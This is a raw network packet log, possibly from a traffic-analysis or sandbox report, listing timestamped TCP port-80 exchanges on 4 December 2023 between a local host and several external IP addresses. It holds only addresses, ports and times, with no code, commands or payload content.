                                                                                                                              Dec 4, 2023 15:23:20.537137032 CET5013980192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:20.646895885 CET8050139216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:20.647842884 CET5013980192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:20.648096085 CET5013980192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:20.773152113 CET8050139216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:20.773633003 CET8050139216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:20.773732901 CET8050139216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:20.773828983 CET8050139216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:20.773953915 CET5013980192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:20.773966074 CET8050139216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:20.773979902 CET8050139216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:20.774013996 CET8050139216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:20.774087906 CET5013980192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:20.774255991 CET5013980192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:20.774455070 CET5013980192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:20.884263039 CET8050139216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:26.233207941 CET5014080192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:26.404038906 CET805014037.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:26.404387951 CET5014080192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:26.404582024 CET5014080192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:26.576653957 CET805014037.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:26.576931953 CET5014080192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:27.910254955 CET5014080192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:28.925987959 CET5014180192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:29.102554083 CET805014137.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:29.102940083 CET5014180192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:29.103007078 CET5014180192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:29.280168056 CET805014137.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:29.280399084 CET5014180192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:30.612904072 CET5014180192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:31.628478050 CET5014280192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:31.804445982 CET805014237.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:31.804596901 CET5014280192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:23:53.684990883 CET5014880192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:53.859375000 CET8050148198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:53.859745026 CET5014880192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:53.859838009 CET5014880192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:54.033523083 CET8050148198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:54.214494944 CET8050148198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:54.214580059 CET8050148198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:54.214792967 CET5014880192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:55.373035908 CET5014880192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:56.388911963 CET5014980192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:56.563932896 CET8050149198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:56.564124107 CET5014980192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:56.564327002 CET5014980192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:56.749084949 CET8050149198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:56.872912884 CET8050149198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:56.872992039 CET8050149198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:56.873466015 CET5014980192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:58.075597048 CET5014980192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.091171026 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.265394926 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.265748978 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.267030954 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.267204046 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.441657066 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.441705942 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.441838026 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.441865921 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.441873074 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.441937923 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.441996098 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.442158937 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.442169905 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.442287922 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.442413092 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.442502022 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.442671061 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.616220951 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.616301060 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.616473913 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.616556883 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.616703033 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.616775036 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.616823912 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.616873026 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.616918087 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.616974115 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.617157936 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.617214918 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.617393970 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.617512941 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.617861986 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.617974043 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.791529894 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.791610003 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.792005062 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.792668104 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.792757034 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.942840099 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.942903042 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.943077087 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:24:00.778176069 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:24:01.793750048 CET5015180192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:24:01.967715025 CET8050151198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:01.967901945 CET5015180192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:24:01.968038082 CET5015180192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:24:02.141629934 CET8050151198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:02.296098948 CET8050151198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:02.296180964 CET8050151198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:02.296538115 CET5015180192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:24:02.296734095 CET5015180192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:24:02.470036983 CET8050151198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:07.426980019 CET5015280192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:07.593471050 CET8050152198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:07.593822956 CET5015280192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:07.593822956 CET5015280192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:07.760164976 CET8050152198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:07.760459900 CET8050152198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:07.760521889 CET8050152198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:07.760627985 CET5015280192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:09.104492903 CET5015280192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:10.120069027 CET5015380192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:10.286443949 CET8050153198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:10.286978960 CET5015380192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:10.287143946 CET5015380192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:10.453423023 CET8050153198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:10.453571081 CET8050153198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:10.453821898 CET8050153198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:10.454165936 CET5015380192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:11.791361094 CET5015380192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:12.806978941 CET5015480192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:12.973603964 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:12.973995924 CET5015480192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:12.975311995 CET5015480192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:13.141844034 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.141933918 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.141997099 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.142056942 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.142080069 CET5015480192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:13.142127037 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.142205000 CET5015480192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:13.142210960 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.142287970 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.142340899 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.142395973 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.142396927 CET5015480192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:13.142472029 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.142528057 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.142651081 CET5015480192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:13.142651081 CET5015480192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:13.308754921 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.308834076 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.308892965 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.308949947 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.309005976 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.309062958 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.310472965 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.310548067 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.310688972 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.310750008 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.310945034 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.311080933 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.311145067 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.311201096 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.311273098 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:15.493863106 CET5015580192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:15.660238028 CET8050155198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:15.660593033 CET5015580192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:15.660726070 CET5015580192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:15.828255892 CET8050155198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:15.828353882 CET8050155198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:15.828425884 CET8050155198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:15.828783989 CET5015580192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:15.828844070 CET5015580192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:15.995212078 CET8050155198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:21.049890995 CET5015680192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:21.232816935 CET805015691.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:21.233274937 CET5015680192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:21.233376980 CET5015680192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:21.417294979 CET805015691.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:21.417371988 CET805015691.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:21.417586088 CET5015680192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:22.742127895 CET5015680192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:23.757767916 CET5015780192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:54.325870037 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.325954914 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.506505013 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.506593943 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.506652117 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.506701946 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.506725073 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.506767035 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.506823063 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.506830931 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.506891012 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.506933928 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.506973028 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.506990910 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.507164955 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.507164955 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.507347107 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.549246073 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.549499035 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.687167883 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.687247992 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.687294960 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.687340975 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.687388897 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.687437057 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.687475920 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.687536955 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.687602043 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.687647104 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.687932014 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.688179016 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.688855886 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.688926935 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.688968897 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.729134083 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.729214907 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.867805004 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.867877960 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.868294954 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.868352890 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.868518114 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.868658066 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.869205952 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.869442940 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:55.828669071 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:56.844209909 CET5016780192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:57.024215937 CET805016789.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:57.024406910 CET5016780192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:57.024666071 CET5016780192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:57.204422951 CET805016789.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:57.205205917 CET805016789.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:57.205296993 CET805016789.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:57.205363989 CET805016789.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:57.205600977 CET805016789.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:57.205691099 CET805016789.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:57.205750942 CET805016789.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:57.205806971 CET805016789.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:57.206074953 CET5016780192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:57.206074953 CET5016780192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:57.206322908 CET5016780192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:57.385972023 CET805016789.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:02.393482924 CET5016880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:02.576035976 CET805016891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:02.576304913 CET5016880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:02.576416016 CET5016880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:02.763046980 CET805016891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:02.763113976 CET805016891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:02.763333082 CET5016880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:04.076800108 CET5016880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:05.092360020 CET5016980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:05.274787903 CET805016991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:05.275105953 CET5016980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:05.275269032 CET5016980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:05.459450960 CET805016991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:05.459523916 CET805016991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:05.459851980 CET5016980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:06.779454947 CET5016980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:07.794922113 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:07.977539062 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:07.977827072 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:07.979127884 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:07.979233027 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:08.160862923 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.160912991 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.161138058 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.161230087 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:08.161297083 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.161313057 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.161417007 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:08.161603928 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:08.161649942 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.161739111 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.161773920 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:08.161889076 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.162116051 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:08.343060970 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.343354940 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:08.343508005 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.343569994 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.343612909 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.343678951 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:08.343818903 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.343854904 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:08.343997955 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.344074965 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.344225883 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.344269037 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.387252092 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.525466919 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.525541067 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.525707006 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.525937080 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.525996923 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.526040077 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.526083946 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.526124954 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.526164055 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.526626110 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.526799917 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.526889086 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.527124882 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:09.481821060 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:10.497494936 CET5017180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:10.679481983 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.679666996 CET5017180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:10.679915905 CET5017180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:10.902801991 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.949726105 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.949829102 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.949912071 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.949990988 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.950047970 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.950103045 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.950206995 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.950299978 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.950356007 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.950361013 CET5017180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:10.950436115 CET805017191.195.240.19192.168.11.20
